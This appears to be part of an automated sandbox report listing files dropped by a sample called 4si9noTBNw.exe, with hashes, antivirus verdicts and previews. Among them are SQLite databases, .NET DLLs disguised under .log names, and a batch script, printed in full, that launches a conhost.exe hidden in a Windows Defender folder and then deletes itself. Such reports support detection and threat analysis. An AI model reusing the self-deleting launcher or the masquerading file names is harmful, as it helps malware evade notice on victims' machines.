                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkxfbpjj.5al.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qddm32wy.1rb.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qgvggcou.004.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ti4mvy4w.e2d.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukhxmqoi.x1q.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtexr3ip.wtv.psm1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xw3zn1eo.sza.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzrqwvkc.i3c.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlqilkp0.o4k.ps1

                                                                                              Download File
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):60
                                                                                              Entropy (8bit):4.038920595031593
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                              Malicious:false
                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                              C:\Users\user\AppData\Local\Temp\bRxYn9DwnZ

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                              Category:dropped
                                                                                              Size (bytes):28672
                                                                                              Entropy (8bit):2.5793180405395284
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\c0j9PivMNz

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.8553638852307782
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):179
                                                                                              Entropy (8bit):5.152225396600093
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZjgL8JA7EfpJSBktKcKZG1t+kiE2J5xAIGyjLkRH:hCRLuVFOOr+DEiyA7EfyKOZG1wkn23fO
                                                                                              MD5:FDA0DA3D9413DD22B474268A51193FA5
                                                                                              SHA1:C771B0B7D02CEC50850B25BCB4835FE20EDDA807
                                                                                              SHA-256:2C8C23151B7D4ACB5A26B9341E25A844041437B6F70C6E08D5560A7179C0CD1D
                                                                                              SHA-512:2C2CD6B62211958CC22DDEC29132C28DA84F3E3C39D558029FF768538DE5618A0DB611D2585DD7481DFC21E51E3FF7BF9D2D690928E8AA3D0BA66EF637DE0C79
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files\Windows Defender\en-GB\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\csCDqY6YZN.bat"

                                                                                              C:\Users\user\AppData\Local\Temp\dDtpmcD5p2

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):98304
                                                                                              Entropy (8bit):0.08235737944063153
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\q99Xyv2u0S

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\AppData\Local\Temp\r1sziyLI1k

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):49152
                                                                                              Entropy (8bit):0.8180424350137764
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                              C:\Users\user\Desktop\JzShoUtR.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):69632
                                                                                              Entropy (8bit):5.932541123129161
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: eu6OEBpBCI.exe, Detection: malicious, Browse
                                                                                              • Filename: IYXE4Uz61k.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: FToZAUe1tw.exe, Detection: malicious, Browse
                                                                                              • Filename: gorkmTnChA.exe, Detection: malicious, Browse
                                                                                              • Filename: fnNUIS1KeW.exe, Detection: malicious, Browse
                                                                                              • Filename: kqq1aAcVUQ.exe, Detection: malicious, Browse
                                                                                              • Filename: Qsi7IgkrWa.exe, Detection: malicious, Browse
                                                                                              • Filename: A5EbyKyjhV.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                              C:\Users\user\Desktop\OuwhFfWF.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):23552
                                                                                              Entropy (8bit):5.519109060441589
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                              C:\Users\user\Desktop\YdQxpHbm.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):69632
                                                                                              Entropy (8bit):5.932541123129161
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                              C:\Users\user\Desktop\e0c743e72394d4

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (507), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):507
                                                                                              Entropy (8bit):5.861894720784801
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:j9GwkCCYqx6sMyC6SnHYvzKqF0nllM5cB3NveXD4:RGwtCYrsMvDtLo5ENvez4
                                                                                              MD5:75CE2391FFED537F5A7042C1FE50EFC7
                                                                                              SHA1:8EC8E602FCB1A4DCCD66A720A2B496F686F8DC97
                                                                                              SHA-256:77DC3612621EA4277692C38B781B0B73AE6C032C30B287F844708028F5B03DA5
                                                                                              SHA-512:1268D99F3F78386A451700DFB77EF665F8940141D6AECCFBAF9C25057702341B818DA1FC7F4816A2FBFCC718D8FCADC79A63D10DEE8394FF4059BFB35F49EE81
                                                                                              Malicious:false
                                                                                              Preview:7bfKwETyxtu4dcAcSt2GxtujsnpobEIBaNFIx4sKIZflgmNv6FC5gXrNr6bIZoWtlsePX2oXBr7XOIDGZ3sVBMfCg1b1cjveDvAxI8YDbo4yZU9i2Vsf5AsYNbtfbw4b6dTcIQ8bfp4WSqmL138H0QiDDljqO2mouc26AgZmXR9QFVFgzhohyxlp5QZgqRNnCPm0yqLVdWujRR7rfC1qOE071NBuH25FEWO0sPsJWTDbCBYnSrAnZgZ7Zp9kobNlaof4DH9QTsU5AY4zzXbZ2Rph7QaCQIe5FcAXgdkLsuUrMd7AvKvR9ysI877wq69LOYzhYgSVxQrH78VdTaRGWM6Qu1ZjfxevuIcxoZmO1ZesHlLAmedQp3yBcjxgHtz9w5Wzfiz4yDO6sNJJqY6BUOG1TbUElFHIke6LOVeEojbmo2SPaozswxohzffENuSs5GWNQ74U42XvweNbIFo6PYVw0YVt0a04QsqhfE8ctfy3a2vVRE5IGVdhujX

                                                                                              C:\Users\user\Desktop\exZDPEZZ.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):85504
                                                                                              Entropy (8bit):5.8769270258874755
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 71%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                              C:\Users\user\Desktop\hEXMkWTV.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):23552
                                                                                              Entropy (8bit):5.519109060441589
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                              C:\Users\user\Desktop\hMjNZkhU.log

                                                                                              Download File
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):85504
                                                                                              Entropy (8bit):5.8769270258874755
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                              MD5:E9CE850DB4350471A62CC24ACB83E859
